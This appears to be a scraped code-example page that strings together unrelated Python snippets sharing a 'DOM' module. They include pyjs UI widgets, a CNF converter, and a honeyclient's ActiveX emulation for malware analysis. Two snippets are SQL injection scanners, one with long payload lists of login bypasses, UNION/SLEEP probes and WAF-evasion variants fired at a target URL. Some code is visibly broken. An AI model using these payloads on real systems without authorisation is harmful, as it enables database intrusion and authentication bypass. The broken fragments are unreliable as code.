예제 #1
0
def set_main_frame(frame):
    global main_frame
    main_frame = frame
    import DOM
    # ok - now the main frame has been set we can initialise the
    # signal handlers etc.
    DOM.init()
예제 #2
0
def open(self, bstrMethod, bstrUrl, varAsync = True, varUser = None, varPassword = None):
    DOM.dom_logging(log, "XMLHTTPRequest.open", bstrUrl)
    msg = "[Microsoft XMLHTTP ActiveX] open('%s', '%s', %s" % (bstrMethod, bstrUrl, varAsync is True, )
    if varUser:
        msg = "%s, '%s'" % (msg, varUser, )
    if varPassword:
        msg = "%s, '%s'" % (msg, varPassword, )
    msg = "%s)" % (msg, )
    log.ThugLogging.add_behavior_warn(msg)
    log.ThugLogging.log_exploit_event(self._window.url,
                                      "Microsoft XMLHTTP ActiveX",
                                      "Open",
                                      forward = False,
                                      data = {
                                                "method" : bstrMethod,
                                                "url"    : str(bstrUrl),
                                                "async"  : str(varAsync)
                                             }
                                     )
    
    self.bstrMethod  = bstrMethod
    self.bstrUrl     = str(bstrUrl)
    self.varAsync    = varAsync
    self.varUser     = varUser
    self.varPassword = varPassword
    return 0
예제 #3
0
 def replaceElement(self, element, widget):
     """
     Replace an existing element with the given widget
     """
     DOM.getParent(element).replaceChild(widget.getElement(), element)
     self.adopt(widget, None)
     self.children.append(widget)
예제 #4
0
    def setWidget(self, index, w):
        """ Sets one of the contained widgets.
            @param index the index, only 0 and 1 are valid
            @param w the widget
        """
        oldWidget = self.widgets[index]

        if oldWidget == w:
          return

        if (w != None):
          w.removeFromParent()

        # Remove the old child.
        if (oldWidget != None):
          # Orphan old.
          orphan(oldWidget)
          # Physical detach old.
          DOM.removeChild(self.elements[index], oldWidget.getElement())

        # Logical detach old / attach new.
        self.widgets[index] = w

        if (w != None):
            # Physical attach new.
            DOM.appendChild(self.elements[index], w.getElement())

            # Adopt new.
            self.adopt(w)
예제 #5
0
def send(self, varBody=None):
    DOM.dom_logging(log, "XMLHTTPRequest.send", varBody)
    msg = "send"
    if varBody:
        msg = "%s('%s')" % (
            msg,
            str(varBody),
        )

    log.ThugLogging.add_behavior_warn("[Microsoft XMLHTTP ActiveX] %s" %
                                      (msg, ))
    log.ThugLogging.add_behavior_warn(
        "[Microsoft XMLHTTP ActiveX] Fetching from URL %s (method: %s)" % (
            self.bstrUrl,
            self.bstrMethod,
        ))
    log.ThugLogging.log_exploit_event(self._window.url,
                                      "Microsoft XMLHTTP ActiveX",
                                      "Send",
                                      forward=False,
                                      data={
                                          "method": self.bstrMethod,
                                          "url": str(self.bstrUrl)
                                      })

    try:
        response = self._window._navigator.fetch(
            self.bstrUrl,
            method=self.bstrMethod,
            headers=self.requestHeaders,
            body=varBody,
            redirect_type="Microsoft XMLHTTP Exploit")
    except:
        log.ThugLogging.add_behavior_warn(
            '[Microsoft XMLHTTP ActiveX] Fetch failed')

    self.responseHeaders = response.headers
    self.responseBody = response.content

    contenttype = self.responseHeaders.get('content-type', None)
    if contenttype is None:
        return

    if 'text/html' in contenttype:
        doc = w3c.parseString(self.responseBody)

        window = DOM.Window.Window(self.bstrUrl,
                                   doc,
                                   personality=log.ThugOpts.useragent)
        #window.open(self.bstrUrl)

        dft = DOM.DFT.DFT(window)
        dft.run()
        return

    handler = log.MIMEHandler.get_handler(contenttype)
    if handler:
        handler(url, html)
예제 #6
0
 def getCellElement(self, row, cell) :
   """   Get a specific Element from the panel.
    
     @param row the row index
     @param cell the cell index
     @return the Element at the given row and cell
   """
   tr = DOM.getChild(self.tbody, row)
   td = DOM.getChild(tr, cell)
   return DOM.getFirstChild(td)
예제 #7
0
 def onError(self, html, statusCode):
     if statusCode == 404 and self.allowEdit:
         self.editor = None
         self.originalText = ""
         DOM.setInnerHTML(self.getElement(), '')
         self.editButton = Label("create "+unescape(self.templateName))
         self.editButton.addStyleName("link")
         self.editButton.addStyleName("ContentPanelEditLink")
         self.editButton.addClickListener(EventDelegate("onClick", self, self.onEditContentClick))
         ComplexPanel.insert(self, self.editButton, self.getElement(), len(self.children))
         return
예제 #8
0
def pygwt_processMetas():
    import DOM
    global pygwt_moduleNames
    metas = doc().get_elements_by_tag_name("meta")
    for i in range(metas.props.length):
        meta = metas.item(i)
        name = DOM.getAttribute(meta, "name")
        if name == "pygwt:module":
            content = DOM.getAttribute(meta, "content")
            if content:
                pygwt_moduleNames.append(content)
    return pygwt_moduleNames
예제 #9
0
 def createTD(self, styleName) :
     """ Create a new table cell with a specific style name.
      
         @param styleName the style name
         @return the new cell {@link Element}
     """
     tdElem = DOM.createTD()
     inner = DOM.createDiv()
     DOM.appendChild(tdElem, inner)
     self.setStyleName(tdElem, styleName)
     self.setStyleName(inner, styleName + "Inner")
     print "createTd", styleName
     return tdElem
예제 #10
0
    def __init__(self, panel):
        self.panel = panel

        DOM.setStyleAttribute(panel.getElement(), "position", "relative")

        topElem = panel.getWidgetElement(TOP)
        bottomElem = panel.getWidgetElement(BOTTOM)

        self.expandToFitParentHorizontally(topElem)
        self.expandToFitParentHorizontally(bottomElem)
        self.expandToFitParentHorizontally(panel.getSplitElement())

        self.panel.expandToFitParentUsingCssOffsets(panel.container)

        # Snap the bottom wrapper to the bottom side.
        DOM.setStyleAttribute(bottomElem, "bottom", "0")
예제 #11
0
 def attachToElement(self, element, widget):    
     events = DOM.getEventsSunk(widget.getElement())
     widget.unsinkEvents(events)
     widget.setElement(element)
     widget.sinkEvents(events)
     self.adopt(widget, None)
     self.children.append(widget)
예제 #12
0
def send(self, varBody = None):
    DOM.dom_logging(log, "XMLHTTPRequest.send", varBody)
    msg = "send"
    if varBody:
        msg = "%s('%s')" % (msg, str(varBody), )

    log.ThugLogging.add_behavior_warn("[Microsoft XMLHTTP ActiveX] %s" % (msg, ))
    log.ThugLogging.add_behavior_warn("[Microsoft XMLHTTP ActiveX] Fetching from URL %s (method: %s)" % (self.bstrUrl, self.bstrMethod, ))
    log.ThugLogging.log_exploit_event(self._window.url,
                                      "Microsoft XMLHTTP ActiveX",
                                      "Send",
                                      forward = False,
                                      data = {
                                                "method" : self.bstrMethod,
                                                "url"    : str(self.bstrUrl)
                                             }
                                     )

    try:
        response = self._window._navigator.fetch(self.bstrUrl,
                                                 method        = self.bstrMethod,
                                                 headers       = self.requestHeaders,
                                                 body          = varBody,
                                                 redirect_type = "Microsoft XMLHTTP Exploit")
    except:
        log.ThugLogging.add_behavior_warn('[Microsoft XMLHTTP ActiveX] Fetch failed')

    self.responseHeaders = response.headers
    self.responseBody    = response.content

    contenttype = self.responseHeaders.get('content-type', None)
    if contenttype is None:
        return

    if 'text/html' in contenttype:
        doc = w3c.parseString(self.responseBody)

        window = DOM.Window.Window(self.bstrUrl, doc, personality = log.ThugOpts.useragent)
        #window.open(self.bstrUrl)

        dft = DOM.DFT.DFT(window)
        dft.run()
        return

    handler = log.MIMEHandler.get_handler(contenttype)
    if handler:
        handler(url, html)
예제 #13
0
    def setTemplateText(self, text):
        """
        Set the template text; if the template is not HTML, a subclass could override this
        to pre-process the text into HTML before passing it to the default implementation.
        """
        if self.allowEdit:
            self.originalText = text
        # If we have children, remove them all first since we are trashing their DOM
        for child in List(self.children):
            self.remove(child)
        
        DOM.setInnerHTML(self.getElement(), text)
        self.elementsById = {}
        self.links = []
        self.metaTags = {}
        self.forms = []
        self.metaTagList = []
        
        # Make the ids unique and store a pointer to each named element
        for node in DOM.walkChildren(self.getElement()):
            #console.log("Passing node with name %s", node.nodeName)
            if node.nodeName == "META":
                name = node.getAttribute("name")
                content = node.getAttribute("content")
                console.log("Found meta %o name %s content %s", node, name, content)
                self.metaTags[name] = content
                self.metaTagList.append(node)
            elif node.nodeName == "BODY":
                self.body = node
            elif node.nodeName == "TITLE":
                self.title = DOM.getInnerText(node)
            elif node.nodeName == "FORM":
                self.forms.append(node)

            nodeId = DOM.getAttribute(node, "id")
            if nodeId:
                self.elementsById[nodeId] = node
                DOM.setAttribute(node, "id", self.id+":"+node.id)
            nodeHref = DOM.getAttribute(node, "href")
            if nodeHref:
                self.links.append(node)
                
        self.loaded = True
        if self.attached:
            self.attachWidgets()
            self.widgetsAttached = True
            
        if self.allowEdit:
            self.editor = None
            self.editButton = Label("edit "+unescape(self.templateName))
            self.editButton.addStyleName("link")
            self.editButton.addStyleName("ContentPanelEditLink")
            self.editButton.addClickListener(EventDelegate("onClick", self, self.onEditContentClick))
            ComplexPanel.insert(self, self.editButton, self.getElement(), len(self.children))

        self.notifyLoadListeners()
예제 #14
0
 def __init__(self, initialValue="", target="", method="POST"):
     Widget.__init__(self);
     self.id = "rte"+hash(self)
     fck = createFCK("fck"+self.id)
     fck.Height = "600px"
     self.setElement(DOM.createForm())
     DOM.setAttribute(self.element, "method", "POST")
     DOM.setAttribute(self.element, "target", target)
     JS("""
     var rte = this;
     this.element.onsubmit = function() {
         $wnd.setTimeout(function() { rte.onSave.call(rte) }, 0);
         return false;
     }
     """)
     self.setID(self.id)
     self.addStyleName("gwt-RichTextEditor")
     fck.Value = initialValue
     fck.BasePath = "fckeditor/"
     fck.Config.CustomConfigurationsPath = "../../fckconfig.js"
     fck.pyjsObject = self
     self.loaded = False
     self.saveListeners = []
     self.pendingHTML = None
     html = fck.CreateHtml()
     #console.log("fck html = %s", html)
     html = html
     DOM.setInnerHTML(self.getElement(), html)
예제 #15
0
 def handle_starttag(self, tag, attrs):
     global cur
     a = {}
     for attr in attrs:
         a[attr[0]] = attr[1]
     cur = DOM.Element(cur, tag, a)
     if tag in self_closing_tags:
         cur.parent.write(cur)
         cur = cur.parent
예제 #16
0
def convert_postfix_to_tree(stat):
    stack = []
    r = re.compile('(~|&|\||=>|[A-Z][A-Z])')
    preds = r.findall(stat)
    for token in preds:
        if token in [operator['and'], operator['or'], operator['implies']]:
            operand2 = stack.pop()
            operand1 = stack.pop()
            op = DOM(token, preds_map)
            op.left = operand1
            op.right = operand2
            stack.append(op)
        elif token == operator['neg']:
            stack[-1].negated = not stack[-1].negated
        else:
            operand = DOM(token, preds_map)
            stack.append(operand)
    return stack[0]
예제 #17
0
    def __init__(self, width, height):
        self.context = None

        self.setElement(DOM.createDiv())
        canvas = DOM.createElement("canvas")
        self.setWidth(width)
        self.setHeight(height)

        canvas.width = width
        canvas.height = height

        DOM.appendChild(self.getElement(), canvas)
        self.setStyleName("gwt-Canvas")

        self.init()

        self.context.fillStyle = "black"
        self.context.strokeStyle = "black"
예제 #18
0
def parse(html):
    global cur
    cur = DOM.Element(None, 'document')
    parser().feed(html)
    while cur.tag != 'document':
        cur.parent.write(cur)
        cur = cur.parent
    if not cur.getElementsByTagName('body'):
        return parse('<html><body>%s</body></html>' % html)
    return cur
예제 #19
0
    def __init__(self, panel):
        self.panel = panel
        self.isResizeInProgress = False
        self.isTopHidden = False
        self.isBottomHidden = False

        elem = panel.getElement()

        # Prevents inherited text-align settings from interfering with the
        # panel's layout.
        DOM.setStyleAttribute(elem, "textAlign", "left")
        DOM.setStyleAttribute(elem, "position", "relative")

        topElem = panel.getWidgetElement(TOP)
        bottomElem = panel.getWidgetElement(BOTTOM)

        self.expandToFitParentHorizontally(topElem)
        self.expandToFitParentHorizontally(bottomElem)
        self.expandToFitParentHorizontally(panel.getSplitElement())

        self.expandToFitParentUsingPercentages(panel.container)
예제 #20
0
def open(self,
         bstrMethod,
         bstrUrl,
         varAsync=True,
         varUser=None,
         varPassword=None):
    DOM.dom_logging(log, "XMLHTTPRequest.open", bstrUrl)
    msg = "[Microsoft XMLHTTP ActiveX] open('%s', '%s', %s" % (
        bstrMethod,
        bstrUrl,
        varAsync is True,
    )
    if varUser:
        msg = "%s, '%s'" % (
            msg,
            varUser,
        )
    if varPassword:
        msg = "%s, '%s'" % (
            msg,
            varPassword,
        )
    msg = "%s)" % (msg, )
    log.ThugLogging.add_behavior_warn(msg)
    log.ThugLogging.log_exploit_event(self._window.url,
                                      "Microsoft XMLHTTP ActiveX",
                                      "Open",
                                      forward=False,
                                      data={
                                          "method": bstrMethod,
                                          "url": str(bstrUrl),
                                          "async": str(varAsync)
                                      })

    self.bstrMethod = bstrMethod
    self.bstrUrl = str(bstrUrl)
    self.varAsync = varAsync
    self.varUser = varUser
    self.varPassword = varPassword
    return 0
예제 #21
0
    def buildDOM(self):
        topDiv = self.getWidgetElement(TOP)
        bottomDiv = self.getWidgetElement(BOTTOM)
        splitDiv = self.getSplitElement()

        DOM.appendChild(self.getElement(), self.container)

        DOM.appendChild(self.container, topDiv)
        DOM.appendChild(self.container, splitDiv)
        DOM.appendChild(self.container, bottomDiv)

        # The style name is placed on the table rather than splitElem
        # to allow the splitter to be styled without interfering
        # with layout.

        thumb_html = '<img src="splitPanelThumb.png" />'
        DOM.setInnerHTML(splitDiv, "<div class='vsplitter' " +
                                   "style='text-align:center'>" +
                                   thumb_html + "</div>")

        self.addScrolling(topDiv)
        self.addScrolling(bottomDiv)
예제 #22
0
    def Integer_sqlinj_scan(self):

        try:
            res_md5_1 = md5_encrypt(
                requests.get(url=self.url, headers=HEADER).text)
            res_md5_2 = md5_encrypt(
                requests.get(url=self.url + urlencode('+1'),
                             headers=HEADER).text)
            res_md5_3 = md5_encrypt(
                requests.get(url=self.url + urlencode('+1-1'),
                             headers=HEADER).text)
            res_DOM_1 = DOM.check(self.url)
            res_DOM_2 = DOM.check(self.url + urlencode('+1'))
            res_DOM_3 = DOM.check(self.url + urlencode('+1-1'))
        except Exception as e:
            print(e)
            res_md5_1 = res_md5_2 = res_md5_3 = 0
            pass

        if (res_DOM_1 == res_DOM_3 and res_DOM_1 != res_DOM_2) or (
            (res_md5_1 == res_md5_3) and res_md5_1 != res_md5_2):
            return self.url
        return 0
예제 #23
0
 def preventBoxStyles(self, elem):
     """ Adds zero or none CSS values for padding, margin and
         border to prevent stylesheet overrides. Returns the
         element for convenience to support builder pattern.
     """
     DOM.setIntStyleAttribute(elem, "padding", 0)
     DOM.setIntStyleAttribute(elem, "margin", 0)
     DOM.setStyleAttribute(elem, "border", "none")
     return elem
예제 #24
0
    def __init__(self):
        """ Creates an empty vertical split panel.
        """
        SplitPanel.__init__(self, DOM.createDiv(),
                            DOM.createDiv(),
                            self.preventBoxStyles(DOM.createDiv()),
                            self.preventBoxStyles(DOM.createDiv()))

        self.container = self.preventBoxStyles(DOM.createDiv())
        self.buildDOM()

        self.setStyleName("gwt-VerticalSplitPanel")

        self.impl = ImplVerticalSplitPanel(self)

        self.setSplitPosition("50%")

        # Captures the height of the top container when drag resizing starts.
        self.initialTopHeight = 0

        # Captures the offset of a user's mouse pointer during drag resizing.
        self.initialThumbPos = 0

        self.lastSplitPosition = ""
예제 #25
0
 def createTR(self, styleName) :
     """ Create a new row with a specific style name. The row
         will contain three cells (Left, Center, and Right), each
         prefixed with the specified style name.
      
         This method allows Widgets to reuse the code on a DOM
         level, without creating a DecoratorPanel Widget.
      
         @param styleName the style name
         @return the new row {@link Element}
     """
     trElem = DOM.createTR()
     self.setStyleName(trElem, styleName)
     DOM.appendChild(trElem, self.createTD(styleName + "Left"))
     DOM.appendChild(trElem, self.createTD(styleName + "Center"))
     DOM.appendChild(trElem, self.createTD(styleName + "Right"))
     return trElem
예제 #26
0
 def __init__(self, templateName, allowEdit=False):
     ComplexPanel.__init__(self)
     self.loaded = False # Set after widgets are attached
     self.widgetsAttached = False
     self.id = None
     self.templateName = None
     self.title = None
     self.elementsById = {}
     self.metaTags = {}
     self.body = None
     self.links = []
     self.forms = []
     self.metaTagList = []
     self.loadListeners = []
     self.toAttach = []
     self.toInsert = []
     self.setElement(DOM.createDiv())
     self.editor = None
     self.allowEdit = allowEdit
     if templateName:
         self.loadTemplate(templateName)
예제 #27
0
파일: CNF.py 프로젝트: manoj1996/CSCI-561 
    def distribute_and_over_or(self, dom, preds_map):
        if dom:
            if dom.val == self.operator['or']:
                if dom.left.val == self.operator[
                        'and'] and dom.right.val == self.operator['and']:
                    left_and, right_and = dom.left, dom.right

                    a, b, c, d = left_and.left, left_and.right, right_and.left, right_and.right
                    a_copy, b_copy, c_copy, d_copy = copy.deepcopy(
                        a), copy.deepcopy(b), copy.deepcopy(c), copy.deepcopy(
                            d)

                    left_or_1 = DOM(self.operator['or'], preds_map)
                    left_or_2 = DOM(self.operator['or'], preds_map)
                    right_or_1 = DOM(self.operator['or'], preds_map)
                    right_or_2 = DOM(self.operator['or'], preds_map)
                    dom.val = self.operator['and']
                    left_and.left, left_and.right, right_and.left, right_and.right = left_or_1, left_or_2, right_or_1, right_or_2

                    left_or_1.left, left_or_1.right = a, c
                    left_or_2.left, left_or_2.right = a_copy, d
                    right_or_1.left, right_or_1.right = b, c_copy
                    right_or_2.left, right_or_2.right = b_copy, d_copy
                elif dom.left.op and not dom.right.op and dom.left.val == self.operator[
                        'and']:
                    c, a = dom.left.right, a = dom.right
                    a_copy = copy.deepcopy(a)
                    right_or = DOM(self.operator['or'], preds_map)
                    dom.val = self.operator['and']
                    dom.left.val = self.operator['or']
                    dom.left.right = a
                    dom.right = right_or
                    right_or.left, right_or.right = c, a_copy
                elif not dom.left.op and dom.right.op and dom.right.val == self.operator[
                        'and']:
                    a = dom.left
                    a_copy = copy.deepcopy(a)
                    b = dom.right.left
                    left_or = DOM(self.operator['or'], preds_map)
                    dom.val = self.operator['and']
                    dom.right.val = self.operator['or']
                    dom.left = left_or
                    left_or.left, left_or.right = a, b
                    dom.right.left = a_copy
            self.distribute_and_over_or(dom.left, preds_map)
            self.distribute_and_over_or(dom.right, preds_map)
예제 #28
0
 def addClipping(self, elem):
     """ Adds clipping to an element.
     """
     DOM.setStyleAttribute(elem, "overflow", "hidden")
예제 #29
0
 def getOffsetHeight(self, elem):
     """ Returns the offsetHeight element property.
     """
     return DOM.getIntAttribute(elem, "offsetHeight")
예제 #30
0
 def setHTML(self, html):
     DOM.setInnerHTML(self.getElement(), html)
예제 #31
0
 def onBrowserEvent(self, event):
     if DOM.eventGetType(event) == Event.ONCLICK:
         for listener in self.clickListeners:
             listener(self)
예제 #32
0
import DOM

def getBodyElement():
    JS(""" return $doc.body; """)

def write(text):
    global data, element
    data += text
    DOM.setInnerHTML(element, data)

def writebr(text):
    write(text + r"<BR>\n")

data = ""
element = DOM.createDiv()
DOM.appendChild(getBodyElement(), element)
예제 #33
0
파일: test008.py 프로젝트: Afey/pyjs 
 def __init__(self):
     ComplexPanel.__init__(self)
     self.setElement(DOM.createDiv())
     DOM.setStyleAttribute(self.getElement(), "overflow", "hidden")
예제 #34
0
 def setStyleName(self, style):
     DOM.setAttribute(self.element, "className", style)
예제 #35
0
import DOM

def getBodyElement():
    """ return $doc.body; """

def write(text):
    global data, element
    data += text
    DOM.setInnerHTML(element, data)

def writebr(text):
    write(text + r"<BR>\n")

data = ""
element = DOM.createDiv()
DOM.appendChild(getBodyElement(), element)
예제 #36
0
 def __init__(self, html=None):
     ButtonBase.__init__(self, DOM.createButton())
     self.setStyleName("gwt-Button")
     if html:
         self.setHTML(html)
예제 #37
0
def write(text):
    global data, element
    data += text
    DOM.setInnerHTML(element, data)
예제 #38
0
 def addAbsolutePositoning(self, elem):
     """ Sets an elements positioning to absolute.
     """
     DOM.setStyleAttribute(elem, "position", "absolute")
예제 #39
0
    def Str_sqlinj_scan(self, waf):
        quotes = ['\'', '"', '']

        payload_0 = [
            " and 0;-- ",
            "/**/and/**/0;#",
            "\tand\t0;#",
            "\nand/**/0;#",
            "\'-\'",
            "\' \'",
            "\'&\'",
            "\'^\'",
            "\'*\'",
            "\' or \'\'-\'",
            "\' or \'\' \'",
            "\' or \'\'&\'",
            "\' or \'\'^\'",
            "\' or \'\'*\'",
            "\"-\"",
            "\" \"",
            "\"&\"",
            "\"^\"",
            "\"*\"",
            "\" or \"\"-\"",
            "\" or \"\" \"",
            "\" or \"\"&\"",
            "\" or \"\"^\"",
            "\" or \"\"*\"",
            "or true--",
            "\" or true--",
            "\' or true--",
            "\") or true--",
            "\') or true--",
            "\' or \'x\'=\'x",
            "\') or (\'x\')=(\'x",
            "\')) or ((\'x\'))=((\'x",
            "\" or \"x\"=\"x",
            "\") or (\"x\")=(\"x",
            "\")) or ((\"x\"))=((\"x",
            "or 1=1",
            "or 1=1--",
            "or 1=1#",
            "or 1=1/*",
            "admin\' --",
            "admin\' #",
            "admin\'/*",
            "admin\' or \'1\'=\'1",
            "admin\' or \'1\'=\'1\'--",
            "admin\' or \'1\'=\'1\'#",
            "admin\' or \'1\'=\'1\'/*",
            "admin\'or 1=1 or \'\'=\'",
            "admin\' or 1=1",
            "admin\' or 1=1--",
            "admin\' or 1=1#",
            "admin\' or 1=1/*",
            "admin\') or (\'1\'=\'1",
            "admin\') or (\'1\'=\'1\'--",
            "admin\') or (\'1\'=\'1\'#",
            "admin\') or (\'1\'=\'1\'/*",
            "admin\') or \'1\'=\'1",
            "admin\') or \'1\'=\'1\'--",
            "admin\') or \'1\'=\'1\'#",
            "admin\') or \'1\'=\'1\'/*",
            "1234 \' AND 1=0 UNION ALL SELECT \'admin\', \'81dc9bdb52d04dc20036dbd8313ed055",
            "admin\" --",
            "admin\" #",
            "admin\"/*",
            "admin\" or \"1\"=\"1",
            "admin\" or \"1\"=\"1\"--",
            "admin\" or \"1\"=\"1\"#",
            "admin\" or \"1\"=\"1\"/*",
            "admin\"or 1=1 or \"\"=\"",
            "admin\" or 1=1",
            "admin\" or 1=1--",
            "admin\" or 1=1#",
            "admin\" or 1=1/*",
            "admin\") or (\"1\"=\"1",
            "admin\") or (\"1\"=\"1\"--",
            "admin\") or (\"1\"=\"1\"#",
            "admin\") or (\"1\"=\"1\"/*",
            "admin\") or \"1\"=\"1",
            "admin\") or \"1\"=\"1\"--",
            "admin\") or \"1\"=\"1\"#",
            "admin\") or \"1\"=\"1\"/*",
            "1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed05\"",
            " UNION ALL SELECT 1,2,3,4",
            " UNION ALL SELECT 1,2,3,4,5-- ",
            " UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5",
            " UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL-- ",
            " AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))-- ",
            " UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--",
            " RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='",
        ]
        payload_1 = [
            " and 1;-- ",
            "/**/and/**/1;#",
            "\tand\t1;#",
            "\nand/**/1;#",
            "\'-\'",
            "\' \'",
            "\'&\'",
            "\'^\'",
            "\'*\'",
            "\' or \'\'-\'",
            "\' or \'\' \'",
            "\' or \'\'&\'",
            "\' or \'\'^\'",
            "\' or \'\'*\'",
            "\"-\"",
            "\" \"",
            "\"&\"",
            "\"^\"",
            "\"*\"",
            "\" or \"\"-\"",
            "\" or \"\" \"",
            "\" or \"\"&\"",
            "\" or \"\"^\"",
            "\" or \"\"*\"",
            "or true--",
            "\" or true--",
            "\' or true--",
            "\") or true--",
            "\') or true--",
            "\' or \'x\'=\'x",
            "\') or (\'x\')=(\'x",
            "\')) or ((\'x\'))=((\'x",
            "\" or \"x\"=\"x",
            "\") or (\"x\")=(\"x",
            "\")) or ((\"x\"))=((\"x",
            "or 1=1",
            "or 1=1--",
            "or 1=1#",
            "or 1=1/*",
            "admin\' --",
            "admin\' #",
            "admin\'/*",
            "admin\' or \'1\'=\'1",
            "admin\' or \'1\'=\'1\'--",
            "admin\' or \'1\'=\'1\'#",
            "admin\' or \'1\'=\'1\'/*",
            "admin\'or 1=1 or \'\'=\'",
            "admin\' or 1=1",
            "admin\' or 1=1--",
            "admin\' or 1=1#",
            "admin\' or 1=1/*",
            "admin\') or (\'1\'=\'1",
            "admin\') or (\'1\'=\'1\'--",
            "admin\') or (\'1\'=\'1\'#",
            "admin\') or (\'1\'=\'1\'/*",
            "admin\') or \'1\'=\'1",
            "admin\') or \'1\'=\'1\'--",
            "admin\') or \'1\'=\'1\'#",
            "admin\') or \'1\'=\'1\'/*",
            "1234 \' AND 1=0 UNION ALL SELECT \'admin\', \'81dc9bdb52d04dc20036dbd8313ed055",
            "admin\" --",
            "admin\" #",
            "admin\"/*",
            "admin\" or \"1\"=\"1",
            "admin\" or \"1\"=\"1\"--",
            "admin\" or \"1\"=\"1\"#",
            "admin\" or \"1\"=\"1\"/*",
            "admin\"or 1=1 or \"\"=\"",
            "admin\" or 1=1",
            "admin\" or 1=1--",
            "admin\" or 1=1#",
            "admin\" or 1=1/*",
            "admin\") or (\"1\"=\"1",
            "admin\") or (\"1\"=\"1\"--",
            "admin\") or (\"1\"=\"1\"#",
            "admin\") or (\"1\"=\"1\"/*",
            "admin\") or \"1\"=\"1",
            "admin\") or \"1\"=\"1\"--",
            "admin\") or \"1\"=\"1\"#",
            "admin\") or \"1\"=\"1\"/*",
            "1234 \" AND 1=0 UNION ALL SELECT \""
            " UNION ALL SELECT 1,2,3,4",
            " UNION ALL SELECT 1,2,3,4,5-- ",
            " UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5",
            " UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL-- ",
            " AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))-- ",
            " UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--",
            " RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='",
        ]
        payload_3 = [
            " And 0;-- ",
            "/**/And/**/0;#",
            "\tAnd\t0;#",
            "\nAnd/**/0;#",
            " Union All Select 1,2,3,4",
            " Union All Select 1,2,3,4,5-- ",
            " Union All Select @@version,sleep(5),user(),benchmark(1000000,md5('A')),5",
            " Union All Select @@version,user(),sleep(5),benchmark(1000000,md5('A')),null,null,null-- ",
            " And 5650=CONVERT(int,(Union all selectchar(88)+char(88)+char(88)))-- ",
            " Union All Select 'inj'||'ect'||'xxx',2,3,4,5--",
            " Rlike (Select (case when (4346=4346) then 0x61646d696e else 0x28 end)) and 'Txws'='",
            " And%200;--",
            " Union%20All%20Select%201,2,3,4",
            " Union%20All%20Select%201,2,3,4,5--",
            " Union%20All%20Select%20@@version,sleep(5),user(),benchmark(1000000,md5(%27A%27)),5",
            " Union%20All%20Select%20@@version,user(),sleep(5),benchmark(1000000,md5(%27A%27)),null,null,null--",
            " And%205650=CONVERT(int,(Union%20all%20selectchar(88)+char(88)+char(88)))--",
            " Union%20All%20Select%20%27inj%27||%27ect%27||%27xxx%27,2,3,4,5--",
            " Rlike%20(Select%20(case%20when%20(4346=4346)%20then%200x61646d696e%20else%200x28%20end))%20and%20%27Txws%27=%27",
            " chr(97)+chr(110)+chr(100) 0;-- ",
            " aandNandd 0;-- ",
        ]
        payload_4 = [
            " And 0;-- ",
            "/**/And/**/0;#",
            "\tAnd\t0;#",
            "\nAnd/**/0;#",
            " Union All Select 1,2,3,4",
            " Union All Select 1,2,3,4,5-- ",
            " Union All Select @@version,sleep(5),user(),benchmark(1000000,md5('A')),5",
            " Union All Select @@version,user(),sleep(5),benchmark(1000000,md5('A')),null,null,null-- ",
            " And 5650=CONVERT(int,(Union all selectchar(88)+char(88)+char(88)))-- ",
            " Union All Select 'inj'||'ect'||'xxx',2,3,4,5--",
            " Rlike (Select (case when (4346=4346) then 0x61646d696e else 0x28 end)) and 'Txws'='",
            " And%200;--",
            " Union%20All%20Select%201,2,3,4",
            " Union%20All%20Select%201,2,3,4,5--",
            " Union%20All%20Select%20@@version,sleep(5),user(),benchmark(1000000,md5(%27A%27)),5",
            " Union%20All%20Select%20@@version,user(),sleep(5),benchmark(1000000,md5(%27A%27)),null,null,null--",
            " And%205650=CONVERT(int,(Union%20all%20selectchar(88)+char(88)+char(88)))--",
            " Union%20All%20Select%20%27inj%27||%27ect%27||%27xxx%27,2,3,4,5--",
            " Rlike%20(Select%20(case%20when%20(4346=4346)%20then%200x61646d696e%20else%200x28%20end))%20and%20%27Txws%27=%27",
            " chr(97)+chr(110)+chr(100) 0;-- ",
            " aandNandd 0;-- ",
        ]

        for i in quotes:
            for j in range(10):
                if waf.cget("text") == 'WAF:None':
                    p0 = i + payload_0[random.randint(0, 85)]
                    p1 = i + payload_1[random.randint(0, 85)]
                else:
                    p0 = i + payload_3[random.randint(0, 85)]
                    p1 = i + payload_4[random.randint(0, 85)]
                try:
                    res_md5_1 = md5_encrypt(
                        requests.get(url=self.url, headers=HEADER).text)
                    res_md5_2 = md5_encrypt(
                        requests.get(url=self.url + urlencode(p0),
                                     headers=HEADER).text)
                    res_md5_3 = md5_encrypt(
                        requests.get(url=self.url + urlencode(p1),
                                     headers=HEADER).text)
                    res_DOM_1 = DOM.check(self.url)
                    res_DOM_2 = DOM.check(self.url + urlencode(p0))
                    res_DOM_3 = DOM.check(self.url + urlencode(p1))
                except Exception as e:
                    print(e)
                    res_md5_1 = res_md5_2 = res_md5_3 = 0
                    pass
                if (res_DOM_1 == res_DOM_3 and res_DOM_1 != res_DOM_2) or (
                    (res_md5_1 == res_md5_3) and res_md5_1 != res_md5_2):
                    return p0 + "~" + self.url
        return 0
예제 #40
0
 def addScrolling(self, elem):
     """ Adds as-needed scrolling to an element.
     """
     DOM.setStyleAttribute(elem, "overflow", "auto")
예제 #41
0
    def __init__(self):
        text = "This is a <code>ScrollPanel</code> contained at "
        text += "the center of a <code>DockPanel</code>.  "
        text += "By putting some fairly large contents "
        text += "in the middle and setting its size explicitly, it becomes a "
        text += "scrollable area within the page, but without requiring the use of "
        text += "an IFRAME."
        text += "Here's quite a bit more meaningless text that will serve primarily "
